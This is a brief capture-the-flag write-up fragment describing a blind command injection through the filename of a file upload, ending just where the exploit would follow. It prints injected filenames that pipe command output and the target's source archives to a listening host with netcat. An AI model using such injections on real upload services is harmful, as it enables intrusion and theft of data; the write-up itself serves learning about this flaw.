This challenge was solved by and the write up was written by teammates, nguyen and akg
Through testing to know it’s a blind cmd injection in filename of a file upload.
Set a host listen to a port and inject a cmd, ex: filename.txt; ls |nc ip port
To copy the source, find .. -iname '*gz'|xargs cat|nc ip port
, analyze it, we have expl: